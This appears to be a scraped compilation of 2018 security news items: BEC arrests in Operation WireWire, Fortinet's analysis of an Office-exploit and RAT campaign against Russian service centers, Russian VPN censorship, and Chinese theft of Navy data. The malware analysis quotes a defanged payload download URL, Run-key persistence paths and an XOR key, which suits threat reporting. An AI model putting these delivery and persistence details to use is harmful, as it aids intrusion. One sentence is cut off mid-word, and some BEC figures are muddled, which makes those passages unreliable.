“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.”

bec operation wirewire

During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. in one case the suspects tricked a real estate closing attorney into wiring $246,000 to their account.

According to a report published by TrendMicro, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 18. This rising value of loss for business takes into account new attack vectors like the one from Lebanese Intelligence Agency Dark Caracal malware who utilizes malware in android application.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $ 5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing Social Engineering to lure and deceive employees in a myriad of scams to bypass security measures. By using a deep understanding of Human Psychology hackers are circumventing the defenses, as the report states ” it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: Bogus invoice scheme, CEO fraud, Account compromise, Attorney impersonation and Data Theft. The report highlight that these attacks can be classified into two major groups: Credential grabbing and email only.

The analysis of losses caused by crimes reported in the FBI 2017 Internet Crime Report, a document that outlines cybercrime trends over the past year, BEC/EAC ($676,151,185) is prominent, followed by Confidence Fraud/Romance ($211,382,989), and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”


Crooks used multi-stage attacks aimed at Russian Service Centers
12.6.18 securityaffairs BigBrothers

Fortinet recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.
Security researchers from Fortinet have recently spotted a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

Experts highlighted the hackers conducted multi-stage attacks but excluded the involvement of a nation-state actor.

Attackers leveraged spear-phishing messages using weaponized Office documents exploiting the 17-Year-Old MS Office flaw CVE-2017-11882 that was addressed by Microsoft updates in October.

The first attacks were observed at the end of March when crooks sent spear-phishing emails to a service company that repairs Samsung’s electronic devices.

The messages were written in Russian and contained a file named “Symptom_and_repair_code_list.xlsx”.

Russian service centers

“FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.” reads the post published by Fortinet.

“A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.”

Experts noticed that the content of the email was the result of a translation made by a translator service, analyzing the headers of the email the experts discovered that the IP address of the sender wasn’t associated with to the domain in the “From” field.

The attackers used a different XLSX file for each email, they used shellcode to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload.

“The two most important functions “imported” by the shellcode are: URLDownloadToFileW and ExpandEnvironmentStringsW.” continues the analysis.

“The purpose of the first one is obvious. The last function is used to determine the exact location where the shellcode should store downloaded payload, since this location will be different under different platforms. Finally, Shellcode downloads a file from the URL: hxxp://brrange.com/imm.exe, stores it in %APPDATA%server.exe, and then tries to execute it.”

The final payload uses multiple-layer multi-packer protection to avoid detection.

The first stage implements the first layer of protection, the popular ConfuserEx packer that obfuscates objects names, as well as names of methods and resources,

The resources are used to determine the next stage payload, which is encrypted using DES, and executes the decrypted file named BootstrapCS that represents the second stage of the multi-layer protection.

BootstrapCS is not obfuscated, but it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This check is essential to avoid the code being execute in a virtualized environment and also searches for and shuts dowIt also writes the payload path to the following startup registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
The stage 3 of the payload is represented by a binary resource named mainfile that represents the third level of packing protection, a simple XOR algorithm with the KEY = 0x20 was used for encryption.

Once the payload is decrypted payload it is injected into a process based on the value in the settings resource file.

The stage 3 of the payload resolves a commercial Remote Administration Tool (RAT) dubbed Imminent Monitor. At stage 4, the security researchers once again used the ConfuserEx packer.

The Imminent Monitor RAT includes the following five modules:

Aforge.Video.DirectShow 2.2.5.0
Aforge.Video 2.2.5.0
Injector 1.0.0.0
ClientPlugin 1.0.0.0
LZLoader 1.0.0.0
that allows the malicious code to control the victim’s machine, including the webcam.

The analysis of the C&C servers revealed 50 domains registered by the attackers on the same day, some of them were used by crooks to deliver malware, while others were involved in phishing attacks. The experts also discovered older .XLSX samples that exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” concludes Fortinet.

Further details are included in the IoCs section of the report.


Multi-Stage Attacks Target Service Centers in Russia

11.6.18 securityweek   BigBrothers

Fortinet security researchers recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

The attacks stand out because of their multi-staging and are believed to have been launched by a non-Russian actor. The attackers used spear-phishing emails and malicious Office documents exploiting CVE-2017-11882, a 17 years old vulnerability in Office’s Equation Editor that Microsoft manually patched in October last year.

The targeted attack started at the end of March with spear-phishing emails received at a service company that repairs Samsung’s electronic devices. Pretending to come from representatives of Samsung, the emails specifically targeted this organization, were written in Russian, and contained a file named Symptom_and_repair_code_list.xlsx, related to the targeted company’s profile.

The emails were likely the result of machine translation, instead of being created by a native Russian speaker, the security researchers reveal. Furthermore, the headers of the email revealed that the IP address of the sender wasn’t related to the domain in the “From” field.

The attackers used different attachments for each email, but all messages had seemingly legitimate .XLSX files attached. Furthermore, all of the documents contained an exploit for the CVE-2017-11882 vulnerability.

The shellcode used in the attacks was meant to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload. It also imports other functions, including one used to determine the exact location where the downloaded payload should be stored.

The payload features multiple-layer multi-packer protection, starting with an initial layer where the well-known ConfuserEx packer was used to obfuscate objects names, along with the names of methods and resources. From these resources, it reads the next stage payload, which is encrypted using DES, and executes the decrypted file.

The decrypted file, named BootstrapCS, is the second stage of the multi-layer protection. While not obfuscated, it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This stage can check for various emulation, sandbox, and virtual machine tools, and also searches for and shuts down specified processes, in addition to disabling system utilities. It also writes the payload path to startup registry keys, hides the file with system and hidden attributes, and injects the payload in various processes.

A binary resource named mainfile is the encrypted stage 3 of the payload. It is an executable that represents the third level of packing protection: a simple XOR algorithm with the KEY = 0x20 was used for encryption. The decrypted payload is injected into a process based on the value in the settings resource file.

The stage 3 of the payload references to a commercial Remote Administration Tool (RAT) called Imminent Monitor, which can be purchased by anyone, directly from the app developer (who apparently prohibits the malicious use of the program). At stage 4, the security researchers once again stumbled upon ConfuserEx.

The main payload of the attack, however, turned out to be the commercial version of the Imminent Monitor RAT, which includes five modules to record videos using the victim’s webcam, to spy on victims, and to control their machines.

The command and control (C&C) servers used in these attacks led the researchers to discover 50 domains registered on the same day, some of which were used to spread malware, while others for phishing attacks. The researchers also discovered older .XLSX samples that use the same C&C but attempt to exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” Fortinet concludes.


Former GCHQ chief Hannigan warns of Russia’s aggressive approach to the cyberspace

11.6.18 securityaffairs  BigBrothers

According to former GCHQ chief, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.
Former GCHQ chief Robert Hannigan has warned that the availability of hacking tools in the main marketplaces is rapidly changing the threat landscape. Hannigan served as the director of the UK intelligence agency between November 2014 until January 2017.

Threat actors have an easy access to attack tools even without having specific knowledge.

Hannigan spoke had a keynote speech titled “Weaponising the web: Nation-state hacking and what it means for enterprise cybersecurity” at the Infosec conference in London last week.

Hannigan highlighted the risks associated with the operation conducted by nation-state actors that had dramatically increased over the last five years.

State-sponsored hackers pose a serious risk for enterprises as well as governments, the former GCHQ chief warned of Government APT group using crime gangs as a proxy machine hard the attribution.

“Nation state attacks using criminal group as a proxy” is a “fairly new issue.” Hacking tools are becoming a commodity for threat actors and represent problem companies.

Hannigan mentioned the activity conducted by North Korea-linked APT and Iranian state-sponsored hackers.

North Korean APT groups, like the infamous Lazarus APT crew, focused its activity on SWIFT network as well as crypto exchanges to steal funds.

“This is a rational state pursuing rational objectives,” explained Hannigan.

Hannigan warned of the intensification of the Iranian hackers that also targeted financial institutions.

Which is the greatest threat?

Russia, of course! Russia-linked APT groups are very sophistication and continuously target infrastructure worldwide. in some cases they demonstrated destructive abilities, like the attacks against the Ukrainian power grid.

Russia

According to Hannigan, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.

“It’s unclear if that was a mistake or an experiment,” Hannigan said. “Russia seems to be live testing things in cyber, as it has been [on the ground] in Syria, but it’s a doctrine we don’t fully understand.”

The former spy chief highlighted the risks associated with state-sponsored malware like WannaCry that caused billion dollars damages to organizations worldwide and severe problems to critical infrastructures, like hospitals in the UK.

“The problem is that the risk of miscalculation is huge,” Hannigan warned.


Search Engines in Russia cannot link to banned VPN services and Internet proxy services
10.6.18 securityaffairs BigBrothers 

Russia strengthens online censorship by announcing fines for search engines that link to VPN serviced banned in the country.
Russian Government has approved a new bill to punish search engines that are not aligned with Moscow and that allows its users to find VPN services, and anonymization tools that allow circumventing the censorship.

According to the amendments to the Code of Administrative Offenses of the Russian Federation, Duma will also impose fines on search engines if they will continue to provide results about queries on an up-to-date database of blocked domains upon users’ request.

Fines for individuals will range between 3,000 and 5,000 rubles (roughly $48 to $80), while officials will face fines up to 50,000 rubles (roughly $800), and legal entities will face fines between 500,000 to 700,000 (roughly $8,019 to $11,227).

“The failure of the operator to perform the search system to connect to this system “entails the imposition of an administrative fine on citizens in the amount of three thousand to five thousand rubles; on officials – from thirty thousand to fifty thousand rubles; on legal entities – from five hundred thousand to seven hundred thousand rubles, “- reads the press release published by the Duma.

Russians ordinary use VPN services and other anonymizing services to access blocked content and bypass censorship, in the following graph we can see the continuous growth for the number of Tor users in Russia.

Search Engines Tor User VPN Russia

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibited the use of any service from the Russian territory if they could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the Government regularity authority.

Since May 3rd, 18, Russia’s media and communication regularity authority Roskomnadzor blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

However, many VPNs and Internet proxy services still haven’t complained about the country law by registering themselves, for this reason, Moscow introduced fines for search engines.

The Russian communications watchdog Roskomnadzor will also provide a Federal State Information System (FGIS) containing the list of banned websites and services in the country, and search engines will need to update the results they provide by connecting to FGIS.

Search engines have 30 days to be aligned with Federal State Information System (FGIS) if the service providers

Those who fail to connect to this system will also face fines similar to those detailed above.

In May, the Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.


Chinese state-sponsored hackers steal 600GB U.S. Navy data
9.6.18 securityaffairs BigBrothers 

According to a report published by The Washington Post, Chinese hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor.
China-linked hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor, the Washington Post reported Friday. The threat actors stole more than 614 gigabytes of data including secret plans to develop a new type of submarine-launched anti-ship missile.

The Washington Post was informed by government officials that spoke on the condition of anonymity.

According to the Washington Post, the security breach took place in January and February, the hackers belong to a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The report published by the media outlet doesn’t reveal the name of the U.S. Navy contractor, it only reports that works for the Naval Undersea Warfare Center, based in Newport, Rhode Island.

“Chinese government hackers have compromised the computers of a Navy contractor, stealing massive amounts of highly sensitive data related to undersea warfare — including secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020, according to American officials.” states the report published by the Washington Post.

“The hackers targeted a contractor who works for the Naval Undersea Warfare Center, a military organization headquartered in Newport, R.I., that conducts research and development for submarines and underwater weaponry.”

Stolen data included unclassified information relating to submarine cryptographic systems, signals and sensor data, and a project called Sea Dragon.

The project Sea Dragon was launched by the Pentagon to extend existing US military technologies for new applications, the US Government already spent more than $300 million for the initiative since 2015.

“The Defense Department, citing classification levels, has released little information about Sea Dragon other than to say that it will introduce a “disruptive offensive capability” by “integrating an existing weapon system with an existing Navy platform.” continues the post.

“The Pentagon has requested or used more than $300 million for the project since late 2015 and has said it plans to start underwater testing by September.”

U.S. Navy chinese hackers

At the time, the U.S. Navy did not comment on the incident for security reason.

“There are measures in place that require companies to notify the government when a ‘cyber incident’ has occurred that has actual or potential adverse effects on their networks that contain controlled unclassified information.” said Cmdr. Bill Speaks, a U.S. Navy spokesman,

“it would be inappropriate to discuss further details at this time.”

“Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities,” he told AFP.

This incident is the last in order of time, Chinese hackers already stole in the past sensitive information from the US military such as the blueprint of the F-35 stealth fighter, the advanced Patriot PAC-3 missile system, and other highly secret projects.


Chinese Government Hackers Steal Trove of U.S. Navy Data: Report

9.6.18 securityweek BigBrothers

Chinese government hackers have stolen a massive trove of sensitive information from a US Navy contractor, including secret plans to develop a new type of submarine-launched anti-ship missile, the Washington Post reported Friday.

Investigators told the newspaper that breaches were executed in January and February by a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The contractor, which was not named in the report, works for the Naval Undersea Warfare Center, based in Newport, Rhode Island. It conducts research and development for submarines and underwater weapons systems.

According to the Post, hackers swiped 614 gigabytes of data that included information relating to sensors, submarine cryptographic systems and a little-known project called Sea Dragon.

The Pentagon has not said much about Sea Dragon, launched in 2012, except that it is aimed at adapting existing military technologies to new uses.

At the Navy's request, the Post withheld information about the compromised new missile system, but said it was for a supersonic anti-ship missile that could be launched from submarines.

Navy spokesman Commander Bill Speaks declined to confirm the Post report, citing security reasons.

"Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities," he told AFP.

Chinese hackers have for years targeted the US military to steal information and the Pentagon says they have previously swiped crucial data on the new F-35 stealth fighter, the advanced Patriot PAC-3 missile system and other highly sensitive projects.

News of the hack comes amid rising tensions between Beijing and Washington on a range of issues including trade and military matters.

The Pentagon last month pulled its invitation for China to join maritime exercises in the Pacific because of Beijing's "continued militarization" of the South China Sea.